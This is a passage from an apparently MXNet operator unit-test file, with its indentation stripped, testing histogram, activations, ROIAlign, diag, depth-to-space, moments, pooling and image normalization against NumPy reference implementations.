print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
